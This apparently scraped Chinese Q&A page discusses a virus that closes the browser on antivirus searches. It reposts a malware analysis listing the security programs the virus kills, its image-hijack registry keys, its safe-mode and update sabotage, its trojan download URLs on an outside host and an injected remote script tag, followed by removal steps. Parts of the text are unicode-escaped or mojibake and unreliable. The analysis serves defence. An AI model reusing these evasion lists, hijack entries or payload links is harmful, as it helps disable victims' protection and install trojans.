是不是最新的病毒?只要搜索“杀毒,木马,瑞星,江民……”等关键字IE就会自动关闭 我的瑞星防火墙,监控中心以及IE防漏墙都是最新的,为什么每次...
\u6211\u7684\u6d4f\u89c8\u5668\u641c\u7d22\u2018\u75c5\u6bd2\u2019\u5c31\u4f1a\u81ea\u52a8\u5173\u6389\uff0c\u662f\u600e\u4e48\u56de\u4e8b\uff1f\uff1f\u6025\u6025\u6025\u4f60\u4e2d\u4e86AV\u7ec8\u7ed3\u8005\uff0c\u8fd9\u4e2a\u75c5\u6bd2\u9644\u5e26\u4e86\u4e00\u4e2a\u53eb\u5a01\u91d1\u7684\u75c5\u6bd2\uff0c\u8fd8\u6709\u4e00\u4e2a\u662f\u666f\u8c61\u75c5\u6bd2\uff0c\u5f88\u96be\u6740\uff0c\u4f60\u73b0\u5728\u7684\u6740\u6bd2\u8f6f\u4ef6\u662f\u7070\u8272\u7684\uff0c\u4e0d\u80fd\u6253\u5f00\uff0c\u89e3\u51b3\u529e\u6cd5\u53ef\u4ee5\u5728\u522b\u4eba\u90a3\u91cc\uff0c\u4e0b\u8f7d\u597d\u4e13\u6740\u8f6f\u4ef6\uff0c\u7136\u540e\u523b\u5230\u789f\u5b50\u4e0a\uff0c\u7528\u789f\u5b50\u6253\u5f00\u5c31\u53ef\u4ee5\u6740\uff0c\u56e0\u4e3a\u75c5\u6bd2\u65e0\u6cd5\u6539\u789f\u5b50\u7684\u6587\u4ef6\uff0c\u5982\u89c9\u5f97\u4e0d\u884c\uff0c\u53ea\u80fd\u91cd\u88c5\u7cfb\u7edf\uff0c\u9700\u8981\u683c\u76d8\uff0c\u90a3\u4e2a\u75c5\u6bd2\u662f\u591a\u529f\u80fd\u7684\uff0c\u8981\u5f7b\u5e95\u9700\u89813\u79cd\u8f6f\u4ef6
\u745e\u661f\u6700\u65b0\u7248\uff1a\u4e0b\u8f7d\u529e\u6cd5\uff1abaidu.com\u4e01\u9999\u9c7c\u745e\u661f\uff0cbaidu.com\u627e\u745e\u661f\u5347\u7ea7\u4fdd\u59c6
baidu.com\u627e\u5a01\u91d1\u7f51\u5427\u4e13\u6740\u7248
baidu.com\u627eAV\u4e13\u6740\uff0c\u5168\u627e\u6765\uff0c\u5148\u7528\u5a01\u91d1\uff0c\u7136\u540e\u7528AV\uff0c\u6740\u5b8c\u540e\u7528\u745e\u661f\u6bbf\u540e\uff0c\u4e00\u5207\u5c31OK
\u5982\u4e0d\u884c\u53ea\u80fd\u683c\u5f0f\u786c\u76d8\u91cd\u65b0\u5b89\u88c5
\u770b\u770b\u4f60\u662f\u4e0d\u662f\u5b89\u88c5\u4e86\u5176\u5b83\u6076\u610f\u8f6f\u4ef6\u6216\u8005\u964c\u751f\u8f6f\u4ef6\u4e86\uff1f\u8bb0\u5f97\u5e73\u65f6\u4e0d\u8981\u4e71\u8fdb\u964c\u751f\u7f51\u7ad9\u770bXX\u56fe\u7247\u3001\u7535\u5f71
最近发现很多人出现了打不开shadu软件 反病 毒工具 甚至带有病 毒字样的窗口 今天就接到了这样的一个样本 先前这是一个可以说结合了几乎所有病 毒的特征的病毒 除了感染文件之外 可以说是比熊猫有过之而无不及!
病毒特征:
1.破坏安全模式
2.结束常见杀毒软件以及反病毒工具进程
3.监控窗口
4.关闭自动更新以及Windows安全中心
5.屏蔽显示隐藏文件
6.下载木马
7.IFEO映像劫持
8.GHOST文件引导破坏
9.各盘符均有引导启动关联文件,即便你重装系统盘也照样发作
分析报告
File: 1201AEC1.exe
Size: 36435 bytes
MD5: 23D80E8E5C2B7EB19E006E80C9BD4BFB
SHA1: E760703C8776C652B424FA62AF945434FB786BE5
CRC32: 27CA1195
加壳方式:UPX
病毒运行后
在C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面释放一个同样由8个数字和字母组成的组合的文
件名的dll 和一个同名的dat 文件
我这里是C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dll
这个随机的数字应该与机器码有关
该dll插入Explorer进程 Timplatform以及ctfmon进程
监视并关闭以下进程以及窗口
AntiVirus
TrojanFirewall
Kaspersky
JiangMin
KV200
kxp
Rising
RAV
RFW
KAV200
KAV6
McAfe
Network Associates
TrustPort
NortonSymantec
SYMANT~1
Norton SystemWorks
ESET
Grisoft
F-Pro
Alwil Software
ALWILS~1
F-Secure
ArcaBit
Softwin
ClamWin
DrWe
Fortineanda Software
Vba3
Trend Micro
QUICKH~1
TRENDM~1
Quick Heal
eSafewido
Prevx1
ers
avg
Ikarus
SophoSunbeltPC-cilli
ZoneAlar
Agnitum
WinAntiVirus
AhnLab
Normasurfsecret
Bullguard\Blac
360safe
SkyNet
Micropoint
Iparmor
ftc
mmjk2007
Antiy Labs
LinDirMicro Lab
Filseclab
ast
System Safety Monitor
ProcessGuard
FengYun
Lavasoft
NOD3
mmsk
The Cleaner
Defendio
kis6Beheadsreng
IceSword
HijackThis
killbox
procexp
Magicset
EQSysSecureProSecurity
Yahoo!
baidu
P4P
Sogou PXP
ardsys
超级兔子木马
KSysFiltsys
KSysCallsys
AVK
K7
Zondex
blcorp
Tiny Firewall Pro
Jetico
HAURI
CA
kmx
PCClear_Plus
Novatix
Ashampoo
WinPatrol
Spy Cleaner Gold
CounterSpy
EagleEyeOS
Webroot
BufferZ
avp
AgentSvr
CCenter
Rav
RavMonD
RavStub
RavTask
rfwcfg
rfwsrv
RsAgent
Rsaupd
runiep
SmartUp
FileDsty
RegClean
360tray
360Safe
360rpt
kabaload
safelive
Ras
KASMain
KASTask
KAV32
KAVDX
KAVStart
KISLnchr
KMailMon
KMFilter
KPFW32
KPFW32X
KPFWSvc
KWatch9x
KWatch
KWatchX
TrojanDetector
UpLive.EXE
KVSrvXP
KvDetect
KRegEx
kvol
kvolself
kvupload
kvwsc
UIHost
IceSword
iparmo
mmsk
adam
MagicSet
PFWLiveUpdate
SREng
WoptiClean
scan32
hcfg32
mcconsol
HijackThis
mmqczj
Trojanwall
FTCleanerShell
loaddll
rfwProxy
KsLoader
KvfwMcl
autoruns
AppSvc32
ccSvcHst
isPwdSvc
symlcsvcnod32kui
avgrssvc
RfwMain
KAVPFW
Iparmor
nod32krn
PFW
RavMon
KAVSetup
NAVSetup
SysSafe
QHSET
zxsweep.
AvMonitor
UmxCfg
UmxFwHlp
UmxPol
UmxAgent
UmxAttachment
KPFW32
KPFW32X
KvXP_1
KVMonXP_1
KvReport
KVScan
KVStub
KvXP
KVMonXP
KVCenter
TrojDie
avp.com.
krepair.COM
KaScrScn.SCR
Trojan
Virus
kaspersky
jiangmin
rising
ikaka
duba
kingsoft
360safe
木马
木马
病毒
shadu
shadu
查 毒
防 毒
反 病 毒
专杀
专杀
卡 巴 斯 基
江 民
瑞 星
卡卡社区
金 山 毒 霸
毒霸
金 山 社 区
3 6 0 安全
恶 意 软 件
流 氓 软 件
举 报
报 警
杀 软
杀 软
防 骇
在C:\WINDOWS\Help\下面生成一个同样由8个数字和字母组成的组合的文件名的chm文件
在C:\WINDOWS\下面生成一个同样由8个数字和字母组成的组合的文件名的hlp文件
删除C:\WINDOWS\system32\verclsid.exe
将其重命名为verclsid.exe.bak
释放41115BDD.exe(随机8位)和autorun.inf到除系统分区外的其他分区
注册表相关操作
删除
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
破坏安全模式
修改
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue值
为0x00000000
HKU\S-1-5-21-1085031214-1078145449-839522115-500
\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden为0x00000002
HKU\S-1-5-21-1085031214-1078145449-839522115-500
\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden为0x00000001
屏蔽显示隐藏文件
修改常见杀毒软件服务的start键值为0x00000004
如HKLM\SYSTEM\ControlSet001\Services\RfwService\Start: 0x00000004
修改HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start
和HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\start键值为0x00000004
关闭自动更新
添加IFEO映像劫持项( 我的意见是用Autoruns删除映像劫持)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepair.COM
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe
被劫持到C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面的那个dat文件
下载dl1.exe到临时文件夹
首先下载http://google.xxxx38.org/update/down.txt看病毒是否需要更新
然后分别下载http://google.xxxx38.org/update/wow.exe
http://google.xxxx38.org/update/mh.exe
http://google.xxxx38.org/update/wm.exe
http://google.xxxx38.org/update/my.exe
http://google.xxxx38.org/update/wl.exe
http://google.xxxx38.org/update/zt.exe
http://google.xxxx38.org/update/jh.exe
http://google.xxxx38.org/update/tl.exe
http://google.xxxx38.org/update/1.exe
http://google.xxxx38.org/update/2.exe 到program files 文件夹 并把他们命名为ycnt1.exe~ycnt10.exe
具体每个文件的生成物就不一一列举了
不过值得一提的是ycnt9.exe这个木马
他生成C:\WINDOWS\system32\win1ogo.exe
并且该木马试图向局域网内所有用户的80端口每隔5000ms进行arp欺骗
插入<script language=javascript src=http://google.171738.org/ad2.js></script>代码
也就是局域网内所有用户在打开网页时都会被插入这段代码
所有木马文件植入完毕后 生成物如下
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
sreng日志反映如下(在处理一些东西后扫描的这里提前列出)
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> []
<Kvsc><C:\WINDOWS\Kvsc3.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{15BD4111-4111-5BDD-115B-111BD1115BDD}><C:\Program Files\Common Files\Microsoft
Shared\MSINFO\41115BDD.dll> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<Userinit><C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\cssrs.exe,> [N/A]
[PID: 1400][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-
2158)]
[C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testdll.dll] [N/A, ]
[C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]
解决办法如下:
1.确定那个8位随机数的dll的名称
这里我们选用winrar确定那个dll的名称
方法是:打开winrar.exe
工具 查看
在上面的地址栏中 进入c:\program files\common files\microsoft shared\msinfo目录
我这台被感染的电脑的文件名为41115bdd.dll
2.使用强制删除工具删除那个dll文件
这里我们选用Xdelbox1.2这个软件
XDelBox1.2(Dos级别灭杀工具):
1、dos级文件删除方式,打造病毒清除新模式
2、无须进入安全模式,即可删除所有病毒文件
3、支持一次重启批量删除多个文件
4、复制路径的删除添加方式更适用于网络求助(支持拖曳)
注意:删除时复制所有要删除文件的路径,在待删除文件列表里点击右键选择从剪贴板导入。导入后在要删除文件上点击右键,选择立刻重启删除,电脑会重启进入DOS界面进行删除操作,删除完成后会自动重启进入你安装的操作系统。操作前注意保存电脑中正在打开的文档。有关XDelBox的详细说明请看xdelbox1.2目录下help.chm
重起机器后
3.恢复被映像劫持的软件
这里我们使用autoruns这个软件 由于这个软件也被映像劫持了 所以我们随便把他改个名字
打开这个软件后 找到Image hijack (映像劫持)
删除除了Your Image File Name Here without a pathSymbolic Debugger for Windows 2000Microsoft Corporationc:\windows\system32\ntsd.exe
以外的所有项目
4.此时我们就可以打开sreng了 呵呵
打开sreng
系统修复 高级修复 点击修复安全模式 在弹出的对话框中点击是
5.恢复显示隐藏文件
把下面的 代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
双击1.reg把这个注册表项导入
好了 此时病毒对于我们的所有限制已经解除了
6.清除其下载的木马了
重起机器 进入安全模式
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹"
清除"隐藏受保护的操作系统文件
用WINRAR打开 然后查看以下路径,将发现的名字都删(里面是病毒下载下来的木马)
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\dl1.exe
C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dat(随机8位数字字母组合)
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\WINDOWS\Help\41115BDD.chm(随机8位数字字母组合)
C:\WINDOWS\system32\DirectX\DirectX.ini
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\41115BDD.hlp(随机8位数字字母组合)
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
C:\Program files\ycnt1.exe~ycnt10.exe(如果有的话)
最后别忘了
7.还是用winrar 删除各个分区下面的autorun.inf和 41115BDD.exe(随机8位数字字母组合)
一定不要双击 最好的方法是用winrar看
8.装杀毒软件 保护好你的电脑
到此为止,病毒已经完全清除。。。
附带本次所有软件(连接绝不丢失):
xdelbox1.2
http://www.hltsoft.cn/download/soft/safetools1/xdelbox1.2.RAR
SREng
http://www.hltsoft.cn/download/soft/safetools1/SREng.rar
Autoruns
http://www.hltsoft.cn/download/soft/safetools1/Autoruns861-YYZ.rar
转贴请注明(风月阁) 来自:http://kairizero.blog.sohu.com/
是中了病毒
但有些系统和硬件的关键或是必需文件的属性也是设置为隐藏的
所以说不是所有的病毒都是隐藏性质的
你这个病毒比较牛XX一点
重装系统搞不定就得低格硬盘了
把硬盘所有的东西都删了并且重新分区就可以了~~
肯定是中了,但已经不是最新的病毒,去年就遇到过,用过好多办法,不行
最后重装了事
重装系统是解决任何电脑问题的灵丹妙药
绛旓細鍙鎼滅储鈥滄潃姣,鏈ㄩ┈,鐟炴槦,姹熸皯鈥︹︹濈瓑鍏抽敭瀛桰E灏变細鑷姩鍏抽棴 鏄ㄥぉ涓婄綉涓嶅皬蹇冧腑浜鐥呮瘨,鐪嬪埌鐟炴槦鐨勬彁绀哄嚭鏉ヤ簡骞跺垹闄や簡鐥呮瘨銆備絾鏄幇鍦ㄧ數鑴戣繘涓嶄簡瀹夊叏妯″紡,涓杩涘張浼氳嚜鍔ㄩ噸璧,鍙互姝e父杩涘叆绯荤粺,浣嗘槸鍗″崱,360瀹夊叏鍗+,鐟炴槦鍏ㄨ繍琛屼笉浜,鍏朵粬杞欢鍙... 鏄ㄥぉ涓婄綉涓嶅皬蹇冧腑浜嗙梾姣,鐪嬪埌鐟炴槦鐨勬彁绀哄嚭鏉ヤ簡骞跺垹闄や簡鐥呮瘨銆備絾鏄幇鍦...
绛旓細浣犱腑鐨勮繖涓梾DU鏄淎 V缁堢粨鑰呪濓紝涔熷氨鏄笗铏梾DU锛屾垨鑰8浣嶉殢鏈烘暟瀛楀瓧姣嶇梾DU 鈥淎 V缁堢粨鑰呪濈梾DU鍙戜綔鐥囩姸 1.鐢熸垚寰堝8浣嶆暟瀛楁垨瀛楁瘝闅忔満鍛藉悕鐨勭梾DU绋嬪簭鏂囦欢锛屽苟鍦ㄧ數鑴戝紑鏈烘椂鑷姩杩愯銆2.缁戞灦瀹夊叏杞欢锛屼腑DU鍚庝細鍙戠幇鍑犱箮鎵鏈夋潃DU杞欢锛岀郴缁熺鐞嗗伐鍏凤紝鍙嶉棿璋嶈蒋浠朵笉鑳芥甯稿惎鍔ㄣ3.涓嶈兘姝e父鏄剧ず闅愯棌鏂囦欢...
绛旓細鎹憺鏄熷弽鐥呮瘨涓績琛ㄧず:鈥滆鐥呮瘨閲囩敤浜嗗绉嶆妧鏈墜娈垫潵淇濇姢鑷韩涓嶈娓呴櫎,渚嬪,瀹冧細缁堢粨鍑犲崄绉嶅父鐢ㄧ殑鏉姣掕蒋浠,濡傛灉鐢ㄦ埛浣跨敤google銆佺櫨搴︾瓑鎼滅储寮曟搸鎼滅储鈥樼梾姣掆,娴忚鍣ㄤ篃浼氳鐥呮瘨寮哄埗鍏抽棴,浣垮緱鐢ㄦ埛鏃犳硶鍙栧緱鐩稿叧淇℃伅銆傚挨涓烘伓鍔g殑鏄,璇ョ梾姣掕繕閲囩敤浜咺FEO鍔寔(windows鏂囦欢鏄犲儚鍔寔)鎶鏈,淇敼娉ㄥ唽琛,浣縌Q鍖荤敓銆360瀹夊叏鍗+绛夊嚑...
绛旓細1銆佹墜鏈轰笂缁忓父鎺ㄥ嚭杩愯鍨冨溇骞垮憡锛屽瀮鍦炬父鎴忎箣绫荤殑鏃跺欙紝浼拌鏄墜鏈轰腑姣掍簡锛岄渶瑕佹潃姣掕蒋浠舵潃姣掍簡銆2銆佺敤鎵嬫満鎼滅储涓涓嬬櫨搴︼紝瑕佹槸娌℃湁涓瘨鐨勬儏鍐碉紝浼氬嚭鐜版敮鎸佺殑缃戦〉锛岃鏄腑姣掍簡鍙兘浼氬嚭鐜颁贡鐮佺瓑绛夋儏鍐点3銆佽繕鏈変竴涓柟娉曪紝鏄氳繃鎵嬫満鐨勬潃姣掕蒋浠鏌ユ潃鐥呮瘨锛屾墜鏈虹瀹跺氨鏄笉閿欑殑鏉姣掕蒋浠讹紝鏌ユ潃鏈鏂扮殑鐥呮瘨銆4銆佹墜鏈烘槸...
